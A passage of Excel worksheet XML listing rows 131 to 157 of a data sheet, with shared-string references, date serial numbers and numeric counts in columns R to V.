        <v>100</v>
      </c>
      <c r="G131" t="s">
        <v>2380</v>
      </c>
      <c r="H131" t="s">
        <v>3070</v>
      </c>
      <c r="I131" t="s">
        <v>31</v>
      </c>
      <c r="J131" t="s">
        <v>262</v>
      </c>
      <c r="K131" t="s">
        <v>31</v>
      </c>
      <c r="L131" t="s">
        <v>77</v>
      </c>
      <c r="M131" t="s">
        <v>262</v>
      </c>
      <c r="N131" t="s">
        <v>263</v>
      </c>
      <c r="Q131" t="s">
        <v>3655</v>
      </c>
      <c r="R131">
        <v>39841</v>
      </c>
      <c r="S131">
        <v>20880</v>
      </c>
      <c r="T131">
        <v>342</v>
      </c>
      <c r="U131">
        <v>594</v>
      </c>
      <c r="V131">
        <v>645</v>
      </c>
      <c r="W131" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="132" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A132" t="s">
        <v>3</v>
      </c>
      <c r="B132">
        <v>44005.645293530091</v>
      </c>
      <c r="C132" t="s">
        <v>3097</v>
      </c>
      <c r="D132">
        <v>160</v>
      </c>
      <c r="E132" t="s">
        <v>3098</v>
      </c>
      <c r="F132">
        <v>120</v>
      </c>
      <c r="G132" t="s">
        <v>3099</v>
      </c>
      <c r="H132" t="s">
        <v>3100</v>
      </c>
      <c r="I132" t="s">
        <v>203</v>
      </c>
      <c r="J132" t="s">
        <v>3101</v>
      </c>
      <c r="K132" t="s">
        <v>16</v>
      </c>
      <c r="L132" t="s">
        <v>83</v>
      </c>
      <c r="M132" t="s">
        <v>72</v>
      </c>
      <c r="Q132" t="s">
        <v>3661</v>
      </c>
      <c r="W132" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="133" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A133" t="s">
        <v>3</v>
      </c>
      <c r="B133">
        <v>44155.753830081019</v>
      </c>
      <c r="C133" t="s">
        <v>3103</v>
      </c>
      <c r="D133">
        <v>102</v>
      </c>
      <c r="E133" t="s">
        <v>3104</v>
      </c>
      <c r="F133">
        <v>102</v>
      </c>
      <c r="G133" t="s">
        <v>3105</v>
      </c>
      <c r="H133" t="s">
        <v>3106</v>
      </c>
      <c r="I133" t="s">
        <v>75</v>
      </c>
      <c r="J133" t="s">
        <v>76</v>
      </c>
      <c r="K133" t="s">
        <v>21</v>
      </c>
      <c r="L133" t="s">
        <v>77</v>
      </c>
      <c r="M133" t="s">
        <v>2703</v>
      </c>
      <c r="Q133" t="s">
        <v>3107</v>
      </c>
      <c r="R133">
        <v>102826</v>
      </c>
      <c r="S133">
        <v>76379</v>
      </c>
      <c r="T133">
        <v>508791</v>
      </c>
      <c r="U133">
        <v>778265</v>
      </c>
      <c r="V133">
        <v>910223</v>
      </c>
      <c r="W133" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="134" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A134" t="s">
        <v>3</v>
      </c>
      <c r="B134">
        <v>43746.727824120368</v>
      </c>
      <c r="C134" t="s">
        <v>3108</v>
      </c>
      <c r="D134">
        <v>121</v>
      </c>
      <c r="E134" t="s">
        <v>3109</v>
      </c>
      <c r="F134">
        <v>100</v>
      </c>
      <c r="G134" t="s">
        <v>3110</v>
      </c>
      <c r="H134" t="s">
        <v>3111</v>
      </c>
      <c r="I134" t="s">
        <v>611</v>
      </c>
      <c r="J134" t="s">
        <v>612</v>
      </c>
      <c r="K134" t="s">
        <v>14</v>
      </c>
      <c r="L134" t="s">
        <v>77</v>
      </c>
      <c r="M134" t="s">
        <v>612</v>
      </c>
      <c r="N134" t="s">
        <v>613</v>
      </c>
      <c r="O134" t="s">
        <v>2122</v>
      </c>
      <c r="P134" t="s">
        <v>612</v>
      </c>
      <c r="Q134" t="s">
        <v>3662</v>
      </c>
      <c r="R134">
        <v>54</v>
      </c>
      <c r="S134">
        <v>8</v>
      </c>
      <c r="T134">
        <v>296</v>
      </c>
      <c r="U134">
        <v>5470</v>
      </c>
      <c r="V134">
        <v>8549</v>
      </c>
      <c r="W134" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="135" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A135" t="s">
        <v>3</v>
      </c>
      <c r="B135">
        <v>44021.135121504631</v>
      </c>
      <c r="C135" t="s">
        <v>3108</v>
      </c>
      <c r="D135">
        <v>121</v>
      </c>
      <c r="E135" t="s">
        <v>3113</v>
      </c>
      <c r="F135">
        <v>104</v>
      </c>
      <c r="G135" t="s">
        <v>3114</v>
      </c>
      <c r="H135" t="s">
        <v>3115</v>
      </c>
      <c r="I135" t="s">
        <v>75</v>
      </c>
      <c r="J135" t="s">
        <v>236</v>
      </c>
      <c r="K135" t="s">
        <v>21</v>
      </c>
      <c r="L135" t="s">
        <v>77</v>
      </c>
      <c r="M135" t="s">
        <v>236</v>
      </c>
      <c r="O135" t="s">
        <v>3116</v>
      </c>
      <c r="P135" t="s">
        <v>909</v>
      </c>
      <c r="Q135" t="s">
        <v>3662</v>
      </c>
      <c r="R135">
        <v>193196</v>
      </c>
      <c r="S135">
        <v>135705</v>
      </c>
      <c r="T135">
        <v>875656</v>
      </c>
      <c r="U135">
        <v>1629054</v>
      </c>
      <c r="V135">
        <v>1694366</v>
      </c>
      <c r="W135" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="136" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A136" t="s">
        <v>3</v>
      </c>
      <c r="B136">
        <v>43777.616899745371</v>
      </c>
      <c r="C136" t="s">
        <v>3117</v>
      </c>
      <c r="D136">
        <v>100</v>
      </c>
      <c r="E136" t="s">
        <v>3118</v>
      </c>
      <c r="F136">
        <v>100</v>
      </c>
      <c r="G136" t="s">
        <v>3119</v>
      </c>
      <c r="H136" t="s">
        <v>3120</v>
      </c>
      <c r="I136" t="s">
        <v>611</v>
      </c>
      <c r="J136" t="s">
        <v>612</v>
      </c>
      <c r="K136" t="s">
        <v>14</v>
      </c>
      <c r="L136" t="s">
        <v>77</v>
      </c>
      <c r="M136" t="s">
        <v>612</v>
      </c>
      <c r="N136" t="s">
        <v>613</v>
      </c>
      <c r="O136" t="s">
        <v>3121</v>
      </c>
      <c r="P136" t="s">
        <v>612</v>
      </c>
      <c r="Q136" t="s">
        <v>3663</v>
      </c>
      <c r="R136">
        <v>5057</v>
      </c>
      <c r="S136">
        <v>6090</v>
      </c>
      <c r="T136">
        <v>50755</v>
      </c>
      <c r="U136">
        <v>102055</v>
      </c>
      <c r="V136">
        <v>135621</v>
      </c>
      <c r="W136" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="137" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A137" t="s">
        <v>3</v>
      </c>
      <c r="B137">
        <v>43746.727824131944</v>
      </c>
      <c r="C137" t="s">
        <v>3108</v>
      </c>
      <c r="D137">
        <v>121</v>
      </c>
      <c r="E137" t="s">
        <v>3123</v>
      </c>
      <c r="F137">
        <v>100</v>
      </c>
      <c r="G137" t="s">
        <v>3124</v>
      </c>
      <c r="H137" t="s">
        <v>3125</v>
      </c>
      <c r="I137" t="s">
        <v>611</v>
      </c>
      <c r="J137" t="s">
        <v>612</v>
      </c>
      <c r="K137" t="s">
        <v>14</v>
      </c>
      <c r="L137" t="s">
        <v>77</v>
      </c>
      <c r="M137" t="s">
        <v>612</v>
      </c>
      <c r="N137" t="s">
        <v>613</v>
      </c>
      <c r="O137" t="s">
        <v>1347</v>
      </c>
      <c r="P137" t="s">
        <v>612</v>
      </c>
      <c r="Q137" t="s">
        <v>3662</v>
      </c>
      <c r="R137">
        <v>136592</v>
      </c>
      <c r="S137">
        <v>100404</v>
      </c>
      <c r="T137">
        <v>586994</v>
      </c>
      <c r="U137">
        <v>906170</v>
      </c>
      <c r="V137">
        <v>899335</v>
      </c>
      <c r="W137" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="138" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A138" t="s">
        <v>3</v>
      </c>
      <c r="B138">
        <v>44203.677725046298</v>
      </c>
      <c r="C138" t="s">
        <v>3126</v>
      </c>
      <c r="D138">
        <v>101</v>
      </c>
      <c r="E138" t="s">
        <v>3127</v>
      </c>
      <c r="F138">
        <v>101</v>
      </c>
      <c r="G138" t="s">
        <v>3128</v>
      </c>
      <c r="H138" t="s">
        <v>3129</v>
      </c>
      <c r="I138" t="s">
        <v>611</v>
      </c>
      <c r="J138" t="s">
        <v>3130</v>
      </c>
      <c r="K138" t="s">
        <v>14</v>
      </c>
      <c r="L138" t="s">
        <v>77</v>
      </c>
      <c r="M138" t="s">
        <v>612</v>
      </c>
      <c r="N138" t="s">
        <v>613</v>
      </c>
      <c r="O138" t="s">
        <v>1336</v>
      </c>
      <c r="Q138" t="s">
        <v>3664</v>
      </c>
      <c r="R138">
        <v>5780</v>
      </c>
      <c r="S138">
        <v>4793</v>
      </c>
      <c r="T138">
        <v>33617</v>
      </c>
      <c r="U138">
        <v>47380</v>
      </c>
      <c r="V138">
        <v>39280</v>
      </c>
      <c r="W138" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="139" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A139" t="s">
        <v>3</v>
      </c>
      <c r="B139">
        <v>43782.656118692132</v>
      </c>
      <c r="C139" t="s">
        <v>3132</v>
      </c>
      <c r="D139">
        <v>111</v>
      </c>
      <c r="E139" t="s">
        <v>3133</v>
      </c>
      <c r="F139">
        <v>100</v>
      </c>
      <c r="G139" t="s">
        <v>3134</v>
      </c>
      <c r="H139" t="s">
        <v>3135</v>
      </c>
      <c r="I139" t="s">
        <v>833</v>
      </c>
      <c r="J139" t="s">
        <v>25</v>
      </c>
      <c r="K139" t="s">
        <v>25</v>
      </c>
      <c r="L139" t="s">
        <v>77</v>
      </c>
      <c r="M139" t="s">
        <v>834</v>
      </c>
      <c r="N139" t="s">
        <v>835</v>
      </c>
      <c r="Q139" t="s">
        <v>3665</v>
      </c>
      <c r="R139">
        <v>2815</v>
      </c>
      <c r="S139">
        <v>1721</v>
      </c>
      <c r="T139">
        <v>10795</v>
      </c>
      <c r="U139">
        <v>21586</v>
      </c>
      <c r="V139">
        <v>23472</v>
      </c>
      <c r="W139" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="140" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A140" t="s">
        <v>3</v>
      </c>
      <c r="B140">
        <v>43850.488308136577</v>
      </c>
      <c r="C140" t="s">
        <v>3137</v>
      </c>
      <c r="D140">
        <v>100</v>
      </c>
      <c r="E140" t="s">
        <v>3138</v>
      </c>
      <c r="F140">
        <v>100</v>
      </c>
      <c r="G140" t="s">
        <v>3139</v>
      </c>
      <c r="H140" t="s">
        <v>3140</v>
      </c>
      <c r="I140" t="s">
        <v>611</v>
      </c>
      <c r="J140" t="s">
        <v>3130</v>
      </c>
      <c r="K140" t="s">
        <v>14</v>
      </c>
      <c r="L140" t="s">
        <v>77</v>
      </c>
      <c r="M140" t="s">
        <v>612</v>
      </c>
      <c r="N140" t="s">
        <v>613</v>
      </c>
      <c r="O140" t="s">
        <v>1395</v>
      </c>
      <c r="Q140" t="s">
        <v>3666</v>
      </c>
      <c r="R140">
        <v>19758</v>
      </c>
      <c r="S140">
        <v>19097</v>
      </c>
      <c r="T140">
        <v>167120</v>
      </c>
      <c r="U140">
        <v>287284</v>
      </c>
      <c r="V140">
        <v>359576</v>
      </c>
      <c r="W140" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="141" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A141" t="s">
        <v>3</v>
      </c>
      <c r="B141">
        <v>43787.387686296293</v>
      </c>
      <c r="C141" t="s">
        <v>3142</v>
      </c>
      <c r="D141">
        <v>110</v>
      </c>
      <c r="E141" t="s">
        <v>3143</v>
      </c>
      <c r="F141">
        <v>110</v>
      </c>
      <c r="G141" t="s">
        <v>3144</v>
      </c>
      <c r="H141" t="s">
        <v>3145</v>
      </c>
      <c r="I141" t="s">
        <v>75</v>
      </c>
      <c r="J141" t="s">
        <v>76</v>
      </c>
      <c r="K141" t="s">
        <v>15</v>
      </c>
      <c r="L141" t="s">
        <v>83</v>
      </c>
      <c r="M141" t="s">
        <v>90</v>
      </c>
      <c r="N141" t="s">
        <v>221</v>
      </c>
      <c r="O141" t="s">
        <v>105</v>
      </c>
      <c r="P141" t="s">
        <v>222</v>
      </c>
      <c r="Q141" t="s">
        <v>3667</v>
      </c>
      <c r="W141" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="142" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A142" t="s">
        <v>3</v>
      </c>
      <c r="B142">
        <v>43797.702984733798</v>
      </c>
      <c r="C142" t="s">
        <v>3147</v>
      </c>
      <c r="D142">
        <v>107</v>
      </c>
      <c r="E142" t="s">
        <v>3148</v>
      </c>
      <c r="F142">
        <v>101</v>
      </c>
      <c r="G142" t="s">
        <v>3149</v>
      </c>
      <c r="H142" t="s">
        <v>3150</v>
      </c>
      <c r="I142" t="s">
        <v>75</v>
      </c>
      <c r="J142" t="s">
        <v>76</v>
      </c>
      <c r="K142" t="s">
        <v>15</v>
      </c>
      <c r="L142" t="s">
        <v>83</v>
      </c>
      <c r="M142" t="s">
        <v>90</v>
      </c>
      <c r="N142" t="s">
        <v>221</v>
      </c>
      <c r="O142" t="s">
        <v>1561</v>
      </c>
      <c r="P142" t="s">
        <v>222</v>
      </c>
      <c r="Q142" t="s">
        <v>3668</v>
      </c>
      <c r="W142" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="143" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A143" t="s">
        <v>3</v>
      </c>
      <c r="B143">
        <v>44019.161265856485</v>
      </c>
      <c r="C143" t="s">
        <v>3147</v>
      </c>
      <c r="D143">
        <v>107</v>
      </c>
      <c r="E143" t="s">
        <v>3152</v>
      </c>
      <c r="F143">
        <v>106</v>
      </c>
      <c r="G143" t="s">
        <v>3153</v>
      </c>
      <c r="H143" t="s">
        <v>3154</v>
      </c>
      <c r="I143" t="s">
        <v>156</v>
      </c>
      <c r="J143" t="s">
        <v>438</v>
      </c>
      <c r="K143" t="s">
        <v>38</v>
      </c>
      <c r="L143" t="s">
        <v>38</v>
      </c>
      <c r="M143" t="s">
        <v>38</v>
      </c>
      <c r="N143" t="s">
        <v>38</v>
      </c>
      <c r="O143" t="s">
        <v>3155</v>
      </c>
      <c r="P143" t="s">
        <v>512</v>
      </c>
      <c r="Q143" t="s">
        <v>3668</v>
      </c>
      <c r="T143">
        <v>1749</v>
      </c>
      <c r="U143">
        <v>2548</v>
      </c>
      <c r="V143">
        <v>5572</v>
      </c>
      <c r="W143" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="144" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A144" t="s">
        <v>3</v>
      </c>
      <c r="B144">
        <v>44076.007642997683</v>
      </c>
      <c r="C144" t="s">
        <v>3156</v>
      </c>
      <c r="D144">
        <v>101</v>
      </c>
      <c r="E144" t="s">
        <v>3157</v>
      </c>
      <c r="F144">
        <v>101</v>
      </c>
      <c r="G144" t="s">
        <v>3158</v>
      </c>
      <c r="H144" t="s">
        <v>3159</v>
      </c>
      <c r="I144" t="s">
        <v>185</v>
      </c>
      <c r="J144" t="s">
        <v>186</v>
      </c>
      <c r="K144" t="s">
        <v>16</v>
      </c>
      <c r="L144" t="s">
        <v>83</v>
      </c>
      <c r="M144" t="s">
        <v>72</v>
      </c>
      <c r="P144" t="s">
        <v>1691</v>
      </c>
      <c r="Q144" t="s">
        <v>3669</v>
      </c>
      <c r="R144">
        <v>496</v>
      </c>
      <c r="S144">
        <v>1138</v>
      </c>
      <c r="T144">
        <v>2844</v>
      </c>
      <c r="U144">
        <v>5708</v>
      </c>
      <c r="V144">
        <v>8033</v>
      </c>
      <c r="W144" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="145" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A145" t="s">
        <v>3</v>
      </c>
      <c r="B145">
        <v>43782.656118761573</v>
      </c>
      <c r="C145" t="s">
        <v>3132</v>
      </c>
      <c r="D145">
        <v>111</v>
      </c>
      <c r="E145" t="s">
        <v>3161</v>
      </c>
      <c r="F145">
        <v>100</v>
      </c>
      <c r="G145" t="s">
        <v>3162</v>
      </c>
      <c r="H145" t="s">
        <v>3163</v>
      </c>
      <c r="I145" t="s">
        <v>833</v>
      </c>
      <c r="J145" t="s">
        <v>25</v>
      </c>
      <c r="K145" t="s">
        <v>25</v>
      </c>
      <c r="L145" t="s">
        <v>77</v>
      </c>
      <c r="M145" t="s">
        <v>834</v>
      </c>
      <c r="N145" t="s">
        <v>835</v>
      </c>
      <c r="Q145" t="s">
        <v>3665</v>
      </c>
      <c r="R145">
        <v>3159</v>
      </c>
      <c r="S145">
        <v>1921</v>
      </c>
      <c r="T145">
        <v>11829</v>
      </c>
      <c r="U145">
        <v>24497</v>
      </c>
      <c r="V145">
        <v>26708</v>
      </c>
      <c r="W145" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="146" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A146" t="s">
        <v>3</v>
      </c>
      <c r="B146">
        <v>43782.656118726853</v>
      </c>
      <c r="C146" t="s">
        <v>3132</v>
      </c>
      <c r="D146">
        <v>111</v>
      </c>
      <c r="E146" t="s">
        <v>3164</v>
      </c>
      <c r="F146">
        <v>100</v>
      </c>
      <c r="G146" t="s">
        <v>3165</v>
      </c>
      <c r="H146" t="s">
        <v>3166</v>
      </c>
      <c r="I146" t="s">
        <v>833</v>
      </c>
      <c r="J146" t="s">
        <v>25</v>
      </c>
      <c r="K146" t="s">
        <v>25</v>
      </c>
      <c r="L146" t="s">
        <v>77</v>
      </c>
      <c r="M146" t="s">
        <v>834</v>
      </c>
      <c r="N146" t="s">
        <v>835</v>
      </c>
      <c r="Q146" t="s">
        <v>3665</v>
      </c>
      <c r="R146">
        <v>94</v>
      </c>
      <c r="S146">
        <v>67</v>
      </c>
      <c r="T146">
        <v>492</v>
      </c>
      <c r="U146">
        <v>1098</v>
      </c>
      <c r="V146">
        <v>1047</v>
      </c>
      <c r="W146" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="147" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A147" t="s">
        <v>3</v>
      </c>
      <c r="B147">
        <v>43782.497609467595</v>
      </c>
      <c r="C147" t="s">
        <v>1769</v>
      </c>
      <c r="D147">
        <v>102</v>
      </c>
      <c r="E147" t="s">
        <v>3167</v>
      </c>
      <c r="F147">
        <v>101</v>
      </c>
      <c r="G147" t="s">
        <v>3168</v>
      </c>
      <c r="H147" t="s">
        <v>3169</v>
      </c>
      <c r="I147" t="s">
        <v>82</v>
      </c>
      <c r="J147" t="s">
        <v>744</v>
      </c>
      <c r="K147" t="s">
        <v>24</v>
      </c>
      <c r="L147" t="s">
        <v>83</v>
      </c>
      <c r="M147" t="s">
        <v>72</v>
      </c>
      <c r="O147" t="s">
        <v>1778</v>
      </c>
      <c r="P147" t="s">
        <v>745</v>
      </c>
      <c r="Q147" t="s">
        <v>3657</v>
      </c>
      <c r="R147">
        <v>4454</v>
      </c>
      <c r="S147">
        <v>2696</v>
      </c>
      <c r="T147">
        <v>18322</v>
      </c>
      <c r="U147">
        <v>35797</v>
      </c>
      <c r="V147">
        <v>49180</v>
      </c>
      <c r="W147" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="148" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A148" t="s">
        <v>3</v>
      </c>
      <c r="B148">
        <v>43782.497609502316</v>
      </c>
      <c r="C148" t="s">
        <v>1769</v>
      </c>
      <c r="D148">
        <v>102</v>
      </c>
      <c r="E148" t="s">
        <v>3170</v>
      </c>
      <c r="F148">
        <v>101</v>
      </c>
      <c r="G148" t="s">
        <v>3171</v>
      </c>
      <c r="H148" t="s">
        <v>1786</v>
      </c>
      <c r="I148" t="s">
        <v>82</v>
      </c>
      <c r="J148" t="s">
        <v>744</v>
      </c>
      <c r="K148" t="s">
        <v>24</v>
      </c>
      <c r="L148" t="s">
        <v>83</v>
      </c>
      <c r="M148" t="s">
        <v>72</v>
      </c>
      <c r="O148" t="s">
        <v>1778</v>
      </c>
      <c r="P148" t="s">
        <v>745</v>
      </c>
      <c r="Q148" t="s">
        <v>3657</v>
      </c>
      <c r="R148">
        <v>87</v>
      </c>
      <c r="S148">
        <v>38</v>
      </c>
      <c r="T148">
        <v>299</v>
      </c>
      <c r="U148">
        <v>568</v>
      </c>
      <c r="V148">
        <v>851</v>
      </c>
      <c r="W148" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="149" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A149" t="s">
        <v>3</v>
      </c>
      <c r="B149">
        <v>44162.734298738425</v>
      </c>
      <c r="C149" t="s">
        <v>3132</v>
      </c>
      <c r="D149">
        <v>111</v>
      </c>
      <c r="E149" t="s">
        <v>3172</v>
      </c>
      <c r="F149">
        <v>101</v>
      </c>
      <c r="G149" t="s">
        <v>3173</v>
      </c>
      <c r="H149" t="s">
        <v>3174</v>
      </c>
      <c r="I149" t="s">
        <v>833</v>
      </c>
      <c r="J149" t="s">
        <v>25</v>
      </c>
      <c r="K149" t="s">
        <v>25</v>
      </c>
      <c r="L149" t="s">
        <v>77</v>
      </c>
      <c r="M149" t="s">
        <v>834</v>
      </c>
      <c r="N149" t="s">
        <v>835</v>
      </c>
      <c r="Q149" t="s">
        <v>3665</v>
      </c>
      <c r="R149">
        <v>125</v>
      </c>
      <c r="S149">
        <v>69</v>
      </c>
      <c r="T149">
        <v>444</v>
      </c>
      <c r="U149">
        <v>1179</v>
      </c>
      <c r="V149">
        <v>1473</v>
      </c>
      <c r="W149" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="150" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A150" t="s">
        <v>3</v>
      </c>
      <c r="B150">
        <v>43999.762850706022</v>
      </c>
      <c r="C150" t="s">
        <v>3175</v>
      </c>
      <c r="D150">
        <v>151</v>
      </c>
      <c r="E150" t="s">
        <v>3176</v>
      </c>
      <c r="F150">
        <v>114</v>
      </c>
      <c r="G150" t="s">
        <v>3177</v>
      </c>
      <c r="H150" t="s">
        <v>2363</v>
      </c>
      <c r="I150" t="s">
        <v>179</v>
      </c>
      <c r="J150" t="s">
        <v>180</v>
      </c>
      <c r="K150" t="s">
        <v>19</v>
      </c>
      <c r="L150" t="s">
        <v>77</v>
      </c>
      <c r="O150" t="s">
        <v>2364</v>
      </c>
      <c r="P150" t="s">
        <v>920</v>
      </c>
      <c r="Q150" t="s">
        <v>3670</v>
      </c>
      <c r="R150">
        <v>32187</v>
      </c>
      <c r="S150">
        <v>26144</v>
      </c>
      <c r="T150">
        <v>43628</v>
      </c>
      <c r="U150">
        <v>290979</v>
      </c>
      <c r="V150">
        <v>439408</v>
      </c>
      <c r="W150" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="151" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A151" t="s">
        <v>3</v>
      </c>
      <c r="B151">
        <v>43907.49058435185</v>
      </c>
      <c r="C151" t="s">
        <v>3175</v>
      </c>
      <c r="D151">
        <v>151</v>
      </c>
      <c r="E151" t="s">
        <v>3179</v>
      </c>
      <c r="F151">
        <v>100</v>
      </c>
      <c r="G151" t="s">
        <v>3180</v>
      </c>
      <c r="H151" t="s">
        <v>1071</v>
      </c>
      <c r="I151" t="s">
        <v>179</v>
      </c>
      <c r="J151" t="s">
        <v>180</v>
      </c>
      <c r="K151" t="s">
        <v>19</v>
      </c>
      <c r="L151" t="s">
        <v>77</v>
      </c>
      <c r="O151" t="s">
        <v>3181</v>
      </c>
      <c r="Q151" t="s">
        <v>3670</v>
      </c>
      <c r="W151" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="152" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A152" t="s">
        <v>3</v>
      </c>
      <c r="B152">
        <v>43986.726563715281</v>
      </c>
      <c r="C152" t="s">
        <v>3175</v>
      </c>
      <c r="D152">
        <v>151</v>
      </c>
      <c r="E152" t="s">
        <v>3182</v>
      </c>
      <c r="F152">
        <v>103</v>
      </c>
      <c r="G152" t="s">
        <v>3183</v>
      </c>
      <c r="H152" t="s">
        <v>3184</v>
      </c>
      <c r="I152" t="s">
        <v>179</v>
      </c>
      <c r="J152" t="s">
        <v>180</v>
      </c>
      <c r="K152" t="s">
        <v>19</v>
      </c>
      <c r="L152" t="s">
        <v>77</v>
      </c>
      <c r="O152" t="s">
        <v>2370</v>
      </c>
      <c r="P152" t="s">
        <v>181</v>
      </c>
      <c r="Q152" t="s">
        <v>3670</v>
      </c>
      <c r="W152" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="153" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A153" t="s">
        <v>3</v>
      </c>
      <c r="B153">
        <v>43907.490584409723</v>
      </c>
      <c r="C153" t="s">
        <v>3175</v>
      </c>
      <c r="D153">
        <v>151</v>
      </c>
      <c r="E153" t="s">
        <v>3185</v>
      </c>
      <c r="F153">
        <v>103</v>
      </c>
      <c r="G153" t="s">
        <v>3186</v>
      </c>
      <c r="H153" t="s">
        <v>3187</v>
      </c>
      <c r="I153" t="s">
        <v>179</v>
      </c>
      <c r="J153" t="s">
        <v>180</v>
      </c>
      <c r="K153" t="s">
        <v>19</v>
      </c>
      <c r="L153" t="s">
        <v>77</v>
      </c>
      <c r="O153" t="s">
        <v>2370</v>
      </c>
      <c r="P153" t="s">
        <v>181</v>
      </c>
      <c r="Q153" t="s">
        <v>3670</v>
      </c>
      <c r="W153" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="154" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A154" t="s">
        <v>3</v>
      </c>
      <c r="B154">
        <v>43795.860850034725</v>
      </c>
      <c r="C154" t="s">
        <v>3188</v>
      </c>
      <c r="D154">
        <v>124</v>
      </c>
      <c r="E154" t="s">
        <v>3189</v>
      </c>
      <c r="F154">
        <v>102</v>
      </c>
      <c r="G154" t="s">
        <v>3190</v>
      </c>
      <c r="H154" t="s">
        <v>3191</v>
      </c>
      <c r="I154" t="s">
        <v>156</v>
      </c>
      <c r="J154" t="s">
        <v>301</v>
      </c>
      <c r="K154" t="s">
        <v>26</v>
      </c>
      <c r="L154" t="s">
        <v>77</v>
      </c>
      <c r="M154" t="s">
        <v>475</v>
      </c>
      <c r="N154" t="s">
        <v>476</v>
      </c>
      <c r="P154" t="s">
        <v>1824</v>
      </c>
      <c r="Q154" t="s">
        <v>3671</v>
      </c>
      <c r="R154">
        <v>122</v>
      </c>
      <c r="W154" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="155" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A155" t="s">
        <v>3</v>
      </c>
      <c r="B155">
        <v>44040.762134421297</v>
      </c>
      <c r="C155" t="s">
        <v>3188</v>
      </c>
      <c r="D155">
        <v>124</v>
      </c>
      <c r="E155" t="s">
        <v>3193</v>
      </c>
      <c r="F155">
        <v>112</v>
      </c>
      <c r="G155" t="s">
        <v>3194</v>
      </c>
      <c r="H155" t="s">
        <v>3195</v>
      </c>
      <c r="I155" t="s">
        <v>156</v>
      </c>
      <c r="J155" t="s">
        <v>301</v>
      </c>
      <c r="K155" t="s">
        <v>26</v>
      </c>
      <c r="L155" t="s">
        <v>77</v>
      </c>
      <c r="M155" t="s">
        <v>475</v>
      </c>
      <c r="N155" t="s">
        <v>476</v>
      </c>
      <c r="Q155" t="s">
        <v>3671</v>
      </c>
      <c r="R155">
        <v>17</v>
      </c>
      <c r="S155">
        <v>4</v>
      </c>
      <c r="T155">
        <v>1788</v>
      </c>
      <c r="U155">
        <v>2602</v>
      </c>
      <c r="V155">
        <v>102</v>
      </c>
      <c r="W155" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="156" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A156" t="s">
        <v>3</v>
      </c>
      <c r="B156">
        <v>44119.849477974538</v>
      </c>
      <c r="C156" t="s">
        <v>3188</v>
      </c>
      <c r="D156">
        <v>124</v>
      </c>
      <c r="E156" t="s">
        <v>3196</v>
      </c>
      <c r="F156">
        <v>104</v>
      </c>
      <c r="G156" t="s">
        <v>3197</v>
      </c>
      <c r="H156" t="s">
        <v>3198</v>
      </c>
      <c r="I156" t="s">
        <v>156</v>
      </c>
      <c r="J156" t="s">
        <v>301</v>
      </c>
      <c r="K156" t="s">
        <v>26</v>
      </c>
      <c r="L156" t="s">
        <v>77</v>
      </c>
      <c r="M156" t="s">
        <v>475</v>
      </c>
      <c r="N156" t="s">
        <v>476</v>
      </c>
      <c r="Q156" t="s">
        <v>3671</v>
      </c>
      <c r="R156">
        <v>405117</v>
      </c>
      <c r="S156">
        <v>326149</v>
      </c>
      <c r="T156">
        <v>2243305</v>
      </c>
      <c r="U156">
        <v>3636291</v>
      </c>
      <c r="V156">
        <v>4072765</v>
      </c>
      <c r="W156" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="157" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A157" t="s">
        <v>3</v>
      </c>
      <c r="B157">
        <v>43764.136447372686</v>
      </c>
      <c r="C157" t="s">
        <v>3199</v>
      </c>
      <c r="D157">
        <v>206</v>
      </c>
      <c r="E157" t="s">
        <v>3200</v>
      </c>
      <c r="F157">
        <v>110</v>
      </c>
      <c r="G157" t="s">
        <v>3201</v>
      </c>
      <c r="H157" t="s">
        <v>2972</v>
      </c>
      <c r="I157" t="s">
        <v>268</v>
      </c>
      <c r="J157" t="s">
        <v>269</v>
      </c>
      <c r="K157" t="s">
        <v>10</v>
      </c>
      <c r="L157" t="s">
        <v>77</v>
      </c>
      <c r="M157" t="s">
